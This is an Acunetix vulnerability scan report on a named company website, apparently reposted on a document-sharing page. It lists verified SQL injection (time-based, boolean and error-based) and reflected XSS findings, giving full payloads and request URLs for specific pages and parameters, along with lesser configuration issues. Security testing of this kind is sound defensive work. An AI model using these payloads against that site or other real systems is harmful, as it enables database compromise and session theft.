Scan Report

Acunetix Website Audit
1 June, 2016
Developer Report
Generated by Acunetix WVS Reporter (v10.0 Build 20150623)
Scan of
http://www.asiatruongphat.com/baobitruongphat.com/index.php
Scan details
Scan information
Start time
Finish time
Scan time
Profile
Server information
Responsive
Server banner
Server OS
Server technologies
5/19/2016 10:36:52 PM
The scan was aborted
10 minutes, 47 seconds
Default
True
nginx
Unknown
PHP
Threat level
Acunetix Threat Level 3
One or more high-severity type vulnerabilities have been discovered by the scanner. A
malicious user can exploit these vulnerabilities and compromise the backend database
and/or deface your website.
Alerts distribution
Total alerts found
High
27
17
Medium
Low
Informational
Alerts summary
Blind SQL Injection
Classification
Base Score: 6.8
CVSS
- Access Vector: Network
- Access Complexity: Medium
- Authentication: None
- Confidentiality Impact: Partial
- Integrity Impact: Partial
- Availability Impact: Partial
CWE-89
CWE
Affected items
/baobitruongphat.com/intro.php
/baobitruongphat.com/news.php
/baobitruongphat.com/newview.php
/baobitruongphat.com/sanpham.php
Variation
s1
1
2
2
Cross site scripting (verified)

Classification
Base Score: 4.4
CVSS
- Confidentiality Impact: None
- Availability Impact: None
CWE-79
CWE
Affected items
Variation
s1
1
2
2
SQL injection
Classification
Base Score: 6.8
CVSS
CWE-89
CWE
Affected items
Variation
s1
1
SQL injection (verified)

Classification
Base Score: 6.8
CVSS
CWE-89
CWE
Affected items
Variation
s1
2
Application error message

Classification
Base Score: 5.0
CVSS
- Access Complexity: Low
- Integrity Impact: None
CWE-200
CWE
Affected items
Variation
s1
1
1
2
HTML form without CSRF protection

Classification
Base Score: 2.6
CVSS
- Access Complexity: High
CWE-352
CWE
Affected items
/baobitruongphat.com/sanpham.php (3ce8cc7a5300957559fcc329f1e1c267)
Variation
s1
Clickjacking: X-Frame-Options header missing

Classification
Base Score: 6.8
CVSS
CWE-693
CWE
Affected items
Web Server
Variation
s1
OPTIONS method is enabled

Classification
Base Score: 5.0
CVSS
CWE-200
CWE
Affected items
Web Server
Variation
s1
4
Possible virtual host found

Classification
Base Score: 5.0
CVSS
CWE-200
CWE
Affected items
webmail.asiatruongphat.com
Variation
s1
Broken links
Classification
Base Score: 0.0
CVSS
CWE-16
CWE
Affected items
/baobitruongphat.com/sitemap.php
Variation
s1
Alert details
Blind SQL Injection
Severity
High
Type
Validation
Reported by module Scripting (Blind_Sql_Injection.script)
Description
This script is possibly vulnerable to SQL Injection attacks.
SQL injection is a vulnerability that allows an attacker to alter back-end SQL statements by manipulating the user input.
An SQL injection occurs when web applications accept user input that is directly placed into a SQL statement and doesn't
properly filter out dangerous characters.
This is one of the most common application layer attacks currently being used on the Internet. Despite the fact that it is
relatively easy to protect against, there is a large number of web applications vulnerable.
Impact
An attacker may execute arbitrary SQL statements on the vulnerable system. This may compromise the integrity of your
database and/or expose sensitive information.
Depending on the back-end database in use, SQL injection vulnerabilities lead to varying levels of data/system access
for the attacker. It may be possible to not only manipulate existing queries, but to UNION in arbitrary data, use sub
selects, or append additional queries. In some cases, it may be possible to read in or write out to files, or to execute shell
commands on the underlying operating system.
Certain SQL Servers such as Microsoft SQL Server contain stored and extended procedures (database server
functions). If an attacker can obtain access to these procedures it may be possible to compromise the entire machine.
Recommendation
Your script should filter metacharacters from user input.
Check detailed information for more information about fixing this vulnerability.
References
How to check for SQL injection vulnerabilities
SQL Injection Walkthrough
VIDEO: SQL Injection tutorial
Acunetix SQL Injection Attack
OWASP PHP Top 5
OWASP Injection Flaws
Affected items
Details
URL encoded GET input id was set to
if(now()=sysdate(),sleep(0),0)/*'XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(now()=sysdate(),sleep(0),0))OR"*/
Tests performed:
- if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/ =>
6.953 s
- if(now()=sysdate(),sleep(0),0)/*'XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(now()=sysdate(),sleep(0),0))OR"*/ => ...
(line truncated)
Request headers
GET
/baobitruongphat.com/intro.php?id=if(now()%3dsysdate()%2csleep(0)%2c0)/*'XOR(if(now()%3d
sysdate()%2csleep(0)%2c0))OR'%22XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR%22*/
HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer: http://www.asiatruongphat.com/baobitruongphat.com/index.php
Host: www.asiatruongphat.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko)
Chrome/41.0.2228.0 Safari/537.21
Accept: */*
Details
URL encoded GET input id was set to 3 AND 3*2*1=6 AND 598=598
Tests performed:
- 0+0+0+3 => TRUE
- 0+598*593+3 => FALSE
- 13-5-2-999 => FALSE
- 13-5-2-3 => TRUE
- 13-2*5+0+0+1-1 => TRUE
- 13-2*6+0+0+1-1 => FALSE
- 3 AND 2+1-1-1=1 AND 598=598 => TRUE
- 3 AND 3+1-1-1=1 AND 598=598 => FALSE[/ ... (line truncated)
Request headers
GET /baobitruongphat.com/news.php?id=3%20AND%203*2*1%3d6%20AND%20598%3d598 HTTP/1.1
Chrome/41.0.2228.0 Safari/537.21
Accept: */*
Details
Tests performed:
- 0+0+0+3 => TRUE
- 0+903*898+3 => FALSE
- 13-5-2-999 => FALSE
- 13-5-2-3 => TRUE
- 13-2*5+0+0+1-1 => TRUE
- 13-2*6+0+0+1-1 => FALSE
- 3 AND 2+1-1-1=1 AND 903=903 => TRUE
- 3 AND 3+1-1-1=1 AND 903=903 => FALSE[/ ... (line truncated)
Request headers
GET /baobitruongphat.com/newview.php?id=3%20AND%203*2*1%3d6%20AND%20903%3d903&mt=81
HTTP/1.1
Chrome/41.0.2228.0 Safari/537.21
Accept: */*
Details
URL encoded GET input mt was set to 79 AND 3*2*1=6 AND 73=73
Tests performed:
- 0+0+0+79 => TRUE
- 0+73*68+79 => FALSE
- 89-5-2-999 => FALSE
- 89-5-2-3 => TRUE
- 89-2*5+0+0+1-1 => TRUE
- 89-2*6+0+0+1-1 => FALSE
- 79 AND 2+1-1-1=1 AND 73=73 => TRUE
- 79 AND 3+1-1-1=1 AND 73=73 => FALSE[/bol ... (line truncated)
Request headers
GET /baobitruongphat.com/newview.php?id=3&mt=79%20AND%203*2*1%3d6%20AND%2073%3d73
HTTP/1.1
Chrome/41.0.2228.0 Safari/537.21
Accept: */*
Details
Tests performed:
- 0+0+0+42 => TRUE
- 0+415*410+42 => FALSE
- 52-5-2-999 => FALSE
- 52-5-2-3 => TRUE
- 52-2*5+0+0+1-1 => TRUE
- 52-2*6+0+0+1-1 => FALSE
- 42 AND 2+1-1-1=1 AND 415=415 => TRUE
- 42 AND 3+1-1-1=1 AND 415=415 => FA ... (line truncated)
Request headers
POST /baobitruongphat.com/sanpham.php?id=42%20AND%203*2*1%3d6%20AND%20415%3d415 HTTP/1.1
Content-Length: 0
Chrome/41.0.2228.0 Safari/537.21
Accept: */*
Details
Tests performed:
- 0+0+0+43 => TRUE
- 0+751*746+43 => FALSE
- 53-5-2-999 => FALSE
- 53-5-2-3 => TRUE
- 53-2*5+0+0+1-1 => TRUE
- 53-2*6+0+0+1-1 => FALSE
- 43 AND 2+1-1-1=1 AND 751=751 => TRUE
- 43 AND 3+1-1-1=1 AND 751=751 => FA ... (line truncated)
Request headers
GET /baobitruongphat.com/sanpham.php?id=43%20AND%203*2*1%3d6%20AND%20751%3d751 HTTP/1.1
8
Chrome/41.0.2228.0 Safari/537.21
Accept: */*
Cross site scripting (verified)

Severity
High
Type
Validation
Reported by module Scripting (XSS.script)
Description
This script is possibly vulnerable to Cross Site Scripting (XSS) attacks.
Cross site scripting (also referred to as XSS) is a vulnerability that allows an attacker to send malicious code (usually in
the form of Javascript) to another user. Because a browser cannot know if the script should be trusted or not, it will
execute the script in the user context allowing the attacker to access any cookies or session tokens retained by the
browser.
Impact
Malicious users may inject JavaScript, VBScript, ActiveX, HTML or Flash into a vulnerable application to fool a user in
order to gather data from them. An attacker can steal the session cookie and take over the account, impersonating the
user. It is also possible to modify the content of the page presented to the user.
Recommendation
References
XSS Filter Evasion Cheat Sheet
How To: Prevent Cross-Site Scripting in ASP.NET
OWASP PHP Top 5
Cross site scripting
VIDEO: How Cross-Site Scripting (XSS) Works
The Cross Site Scripting Faq
OWASP Cross Site Scripting
Acunetix Cross Site Scripting Attack
XSS Annihilation
Affected items
Details
URL encoded GET input id was set to 2'"()&%<acx><ScRiPt >prompt(930407)</ScRiPt>
Request headers
GET
/baobitruongphat.com/intro.php?id=2'%22()%26%25<acx><ScRiPt%20>prompt(930407)</ScRiPt>
HTTP/1.1
Chrome/41.0.2228.0 Safari/537.21
Accept: */*
Details
Request headers
GET
/baobitruongphat.com/news.php?id=3'%22()%26%25<acx><ScRiPt%20>prompt(986729)</ScRiPt>
HTTP/1.1
10
Chrome/41.0.2228.0 Safari/537.21
Accept: */*
Details
Request headers
GET
/baobitruongphat.com/newview.php?id=3'%22()%26%25<acx><ScRiPt%20>prompt(935239)</ScRiPt>
&mt=81 HTTP/1.1
Chrome/41.0.2228.0 Safari/537.21
Accept: */*
Details
URL encoded GET input mt was set to 79'"()&%<acx><ScRiPt >prompt(994796)</ScRiPt>
Request headers
GET
/baobitruongphat.com/newview.php?id=3&mt=79'%22()%26%25<acx><ScRiPt%20>prompt(994796)</S
cRiPt> HTTP/1.1
Chrome/41.0.2228.0 Safari/537.21
Accept: */*
Details
Request headers
POST
/baobitruongphat.com/sanpham.php?id=42'%22()%26%25<acx><ScRiPt%20>prompt(946739)</ScRiPt
> HTTP/1.1
Content-Length: 0
Chrome/41.0.2228.0 Safari/537.21
Accept: */*
Details
Request headers
GET
/baobitruongphat.com/sanpham.php?id=43'%22()%26%25<acx><ScRiPt%20>prompt(977060)</ScRiPt
> HTTP/1.1
Chrome/41.0.2228.0 Safari/537.21
11
Accept: */*
12
SQL injection
Severity
High
Type
Validation
Reported by module Scripting (Sql_Injection.script)
Description
Impact
Recommendation
References
OWASP PHP Top 5
Affected items
Details
URL encoded GET input id was set to 1'"
Error message found: You have an error in your SQL syntax
Request headers
GET /baobitruongphat.com/intro.php?id=1'%22 HTTP/1.1
Chrome/41.0.2228.0 Safari/537.21
Accept: */*
Details
URL encoded GET input id was set to 1'"
Request headers
13
GET /baobitruongphat.com/newview.php?id=1'%22&mt=81 HTTP/1.1

Chrome/41.0.2228.0 Safari/537.21
Accept: */*
14
SQL injection (verified)

Severity
High
Type
Validation
Reported by module Scripting (Sql_Injection.script)
Description
Impact
Recommendation
References
OWASP PHP Top 5
Affected items
Details
URL encoded GET input id was set to (select 1 and row(1,1)>(select
count(*),concat(concat(CHAR(52),CHAR(67),CHAR(117),CHAR(55),CHAR(81),CHAR(74),CHAR(66),CHAR(90),CHAR(
108),CHAR(99),CHAR(109)),floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))
Injected pattern found: 4Cu7QJBZlcm
Request headers
GET
/baobitruongphat.com/news.php?id=(select%201%20and%20row(1%2c1)>(select%20count(*)%2ccon
cat(concat(CHAR(52)%2cCHAR(67)%2cCHAR(117)%2cCHAR(55)%2cCHAR(81)%2cCHAR(74)%2cCHAR(66)%2
cCHAR(90)%2cCHAR(108)%2cCHAR(99)%2cCHAR(109))%2cfloor(rand()*2))x%20from%20(select%201%2
0union%20select%202)a%20group%20by%20x%20limit%201)) HTTP/1.1
Chrome/41.0.2228.0 Safari/537.21
Accept: */*
15
Details
count(*),concat(concat(CHAR(52),CHAR(67),CHAR(117),CHAR(76),CHAR(49),CHAR(117),CHAR(84),CHAR(48),CHAR
(81),CHAR(80),CHAR(106)),floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))
Injected pattern found: 4CuL1uT0QPj
Request headers
POST
/baobitruongphat.com/sanpham.php?id=(select%201%20and%20row(1%2c1)>(select%20count(*)%2c
concat(concat(CHAR(52)%2cCHAR(67)%2cCHAR(117)%2cCHAR(76)%2cCHAR(49)%2cCHAR(117)%2cCHAR(8
4)%2cCHAR(48)%2cCHAR(81)%2cCHAR(80)%2cCHAR(106))%2cfloor(rand()*2))x%20from%20(select%20
1%20union%20select%202)a%20group%20by%20x%20limit%201)) HTTP/1.1
Content-Length: 0
Chrome/41.0.2228.0 Safari/537.21
Accept: */*
Details
count(*),concat(concat(CHAR(52),CHAR(67),CHAR(117),CHAR(89),CHAR(104),CHAR(51),CHAR(112),CHAR(51),CHA
R(84),CHAR(114),CHAR(82)),floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))
Injected pattern found: 4CuYh3p3TrR
Request headers
GET
/baobitruongphat.com/sanpham.php?id=(select%201%20and%20row(1%2c1)>(select%20count(*)%2c
concat(concat(CHAR(52)%2cCHAR(67)%2cCHAR(117)%2cCHAR(89)%2cCHAR(104)%2cCHAR(51)%2cCHAR(1
12)%2cCHAR(51)%2cCHAR(84)%2cCHAR(114)%2cCHAR(82))%2cfloor(rand()*2))x%20from%20(select%2
01%20union%20select%202)a%20group%20by%20x%20limit%201)) HTTP/1.1
Chrome/41.0.2228.0 Safari/537.21
Accept: */*
16
Application error message

Severity
Medium
Type
Validation
Reported by module Scripting (Error_Message.script)
Description
This page contains an error/warning message that may disclose sensitive information. The message can also contain the
location of the file that produced the unhandled exception.
This may be a false positive if the error message is found in documentation pages.
Impact
The error messages may disclose sensitive information. This information can be used to launch further attacks.
Recommendation
Review the source code for this script.
References
PHP Runtime Configuration
Affected items
Details
Request headers
GET /baobitruongphat.com/intro.php?id= HTTP/1.1
Chrome/41.0.2228.0 Safari/537.21
Accept: */*
Details
Request headers
GET /baobitruongphat.com/news.php?id= HTTP/1.1
Chrome/41.0.2228.0 Safari/537.21
Accept: */*
Details
Request headers
GET /baobitruongphat.com/newview.php?id=&mt=81 HTTP/1.1
17

Chrome/41.0.2228.0 Safari/537.21
Accept: */*
Details
Request headers
GET /baobitruongphat.com/sanpham.php?id= HTTP/1.1
Chrome/41.0.2228.0 Safari/537.21
Accept: */*
Details
Request headers
POST /baobitruongphat.com/sanpham.php?id= HTTP/1.1
Content-Length: 0
Chrome/41.0.2228.0 Safari/537.21
Accept: */*
18
HTML form without CSRF protection

Severity
Medium
Type
Informational
Reported by module Crawler
Description
This alert may be a false positive, manual confirmation is required.
Cross-site request forgery, also known as a one-click attack or session riding and abbreviated as CSRF or XSRF, is a
type of malicious exploit of a website whereby unauthorized commands are transmitted from a user that the website
trusts.
Acunetix WVS found a HTML form with no apparent CSRF protection implemented. Consult details for more information
about the affected HTML form.
Impact
An attacker may force the users of a web application to execute actions of the attacker''s choosing. A successful CSRF
exploit can compromise end user data and operation in case of normal user. If the targeted end user is the administrator
account, this can compromise the entire web application.
Recommendation
Check if this form requires CSRF protection and implement CSRF countermeasures if necessary.
Affected items
/baobitruongphat.com/sanpham.php (3ce8cc7a5300957559fcc329f1e1c267)
Details
Form name: <empty>
Form action: http://www.asiatruongphat.com/baobitruongphat.com/sanpham.php?id=43
Form method: POST
Request headers
GET /baobitruongphat.com/sanpham.php?id=43 HTTP/1.1
Pragma: no-cache
Cache-Control: no-cache
Referer: http://www.asiatruongphat.com/baobitruongphat.com/intro.php
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: *****
Acunetix-Aspect-Queries: filelist;aspectalerts
Chrome/41.0.2228.0 Safari/537.21
Accept: */*
19
Clickjacking: X-Frame-Options header missing

Severity
Low
Type
Configuration
Reported by module Scripting (Clickjacking_X_Frame_Options.script)
Description
Clickjacking (User Interface redress attack, UI redress attack, UI redressing) is a malicious technique of tricking a Web
user into clicking on something different from what the user perceives they are clicking on, thus potentially revealing
confidential information or taking control of their computer while clicking on seemingly innocuous web pages.
The server didn't return an X-Frame-Options header which means that this website could be at risk of a clickjacking
attack. The X-Frame-Options HTTP response header can be used to indicate whether or not a browser should be
allowed to render a page inside a frame or iframe. Sites can use this to avoid clickjacking attacks, by ensuring that their
content is not embedded into other sites.
Impact
The impact depends on the affected web application.
Recommendation
Configure your web server to include an X-Frame-Options header. Consult Web references for more information about
the possible values for this header.
References
Clickjacking
Original Clickjacking paper
Defending with Content Security Policy frame-ancestors directive
Frame Buster Buster
Clickjacking Protection for Java EE
The X-Frame-Options response header
Affected items
Web Server
Details
No details are available.
Request headers
GET / HTTP/1.1
Chrome/41.0.2228.0 Safari/537.21
Accept: */*
20
OPTIONS method is enabled

Severity
Low
Type
Validation
Reported by module Scripting (Options_Server_Method.script)
Description
HTTP OPTIONS method is enabled on this web server. The OPTIONS method provides a list of the methods that are
supported by the web server, it represents a request for information about the communication options available on the
request/response chain identified by the Request-URI.
Impact
The OPTIONS method may expose sensitive information that may help an malicious user to prepare more advanced
attacks.
Recommendation
It's recommended to disable OPTIONS Method on the web server.
References
Testing for HTTP Methods and XST (OWASP-CM-008)
Affected items
Web Server
Details
Methods allowed: GET,HEAD,POST,OPTIONS
Request headers
OPTIONS / HTTP/1.1
Chrome/41.0.2228.0 Safari/537.21
Accept: */*
21
Possible virtual host found

Severity
Low
Type
Configuration
Reported by module Scripting (VirtualHost_Audit.script)
Description
Virtual hosting is a method for hosting multiple domain names (with separate handling of each name) on a single server
(or pool of servers). This allows one server to share its resources, such as memory and processor cycles, without
requiring all services provided to use the same host name.
This web server is responding differently when the Host header is manipulated and various common virtual hosts are
tested. This could indicate there is a Virtual Host present.
Impact
Possible sensitive information disclosure.
Recommendation
Consult the virtual host configuration and check if this virtual host should be publicly accessible.
References
Virtual hosting
Affected items
webmail.asiatruongphat.com
Details
VirtualHost: webmail.asiatruongphat.com
Response:
<!DOCTYPE html>
<html dir="ltr">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta name="google" content="notranslate" />
<title>Webmail Login</title>
<link rel="shortcut icon"
href="data:image/x-icon;base64,AAABAAEAICAAAAEAIADSAgAAFgAAAIlQTkcNChoKAAAADUlIRFIAAAAgAAAAIAgG
AAAAc3p69AAAAplJREFUWIXt1j2IHGUYB/DfOzdnjIKFkECIVWIKvUFsIkRExa9KJCLaWAgWJx4DilZWgpDDiI0wiViIoG
ATP1CCEDYHSeCwUBBkgii
Request headers
GET / HTTP/1.1
Host: webmail.asiatruongphat.com
Chrome/41.0.2228.0 Safari/537.21
Accept: */*
22
Broken links
Severity
Informational
Type
Informational
Reported by module Crawler
Description
A broken link refers to any link that should take you to a document, image or webpage, that actually results in an error.
This page was linked from the website but it is inaccessible.
Impact
Problems navigating the site.
Recommendation
Remove the links to this file or make it accessible.
Affected items
/baobitruongphat.com/sitemap.php
Details
For a complete list of URLs linking to this file, go to Site Structure > Locate and select the file (marked as "Not Found") >
select Referrers Tab from the bottom of the Information pane.
Request headers
GET /baobitruongphat.com/sitemap.php HTTP/1.1
Pragma: no-cache
Cache-Control: no-cache
Referer: http://www.asiatruongphat.com/baobitruongphat.com/intro.php
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: *****
Acunetix-Aspect-Queries: filelist;aspectalerts
Chrome/41.0.2228.0 Safari/537.21
Accept: */*
23
Scanned items (coverage report)

Scanned 15 URLs. Found 5 vulnerable.
URL: http://www.asiatruongphat.com/baobitruongphat.com/
No vulnerabilities have been identified for this URL
No input(s) found for this URL
URL: http://www.asiatruongphat.com/baobitruongphat.com/index.php
1 input(s) found for this URL
Inputs
Input scheme 1
Input name
Host
Input type
HTTP Header
URL: http://www.asiatruongphat.com/baobitruongphat.com/intro.php
Vulnerabilities have been identified for this URL
Inputs
Input scheme 1
Input name
id
Input type
URL encoded GET
URL: http://www.asiatruongphat.com/baobitruongphat.com/news.php
Inputs
Input scheme 1
Input name
id
Input type
URL encoded GET
URL: http://www.asiatruongphat.com/baobitruongphat.com/contact.php
URL: http://www.asiatruongphat.com/baobitruongphat.com/sitemap.php
URL: http://www.asiatruongphat.com/baobitruongphat.com/newview.php
Inputs
Input scheme 1
Input name
id
mt
Input type
URL encoded GET
URL encoded GET
URL: http://www.asiatruongphat.com/baobitruongphat.com/sanpham.php
Inputs
Input scheme 1
Input name
id
Input type
URL encoded GET
24
Input scheme 2
Input name
id
Input type
URL encoded GET
URL: http://www.asiatruongphat.com/baobitruongphat.com/SlideShow.swf
URL: http://www.asiatruongphat.com/baobitruongphat.com/images/
URL: http://www.asiatruongphat.com/baobitruongphat.com/truongphat.swf
URL: http://www.asiatruongphat.com/baobitruongphat.com/css/
URL: http://www.asiatruongphat.com/baobitruongphat.com/css/corpstyle.css
URL: http://www.asiatruongphat.com/baobitruongphat.com/flv.js
URL: http://www.asiatruongphat.com/baobitruongphat.com/upload/
25

Scan Report

Încărcat de

Informații document

Descriere originală:

Drepturi de autor

Formate disponibile

Partajați acest document

Partajați sau inserați document

Opțiuni de partajare

Vi se pare util acest document?

Este necorespunzător acest conținut?

Drepturi de autor:

Formate disponibile

Scan Report

Încărcat de

Drepturi de autor:

Formate disponibile

Acunetix Website Audit

Generated by Acunetix WVS Reporter (v10.0 Build 20150623)

Acunetix Website Audit

Cross site scripting (verified)

SQL injection (verified)

Acunetix Website Audit

Application error message

HTML form without CSRF protection

Clickjacking: X-Frame-Options header missing

OPTIONS method is enabled

Possible virtual host found

Acunetix Website Audit

Acunetix Website Audit

Acunetix Website Audit

Cross site scripting (verified)

Acunetix Website Audit

GET /baobitruongphat.com/newview.php?id=1'%22&mt=81 HTTP/1.1

Acunetix Website Audit

SQL injection (verified)

Acunetix Website Audit

Application error message

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko)

Acunetix Website Audit

HTML form without CSRF protection

Acunetix Website Audit

Clickjacking: X-Frame-Options header missing

Acunetix Website Audit

OPTIONS method is enabled

Acunetix Website Audit

Possible virtual host found

Acunetix Website Audit

Acunetix Website Audit

Scanned items (coverage report)

Acunetix Website Audit

S-ar putea să vă placă și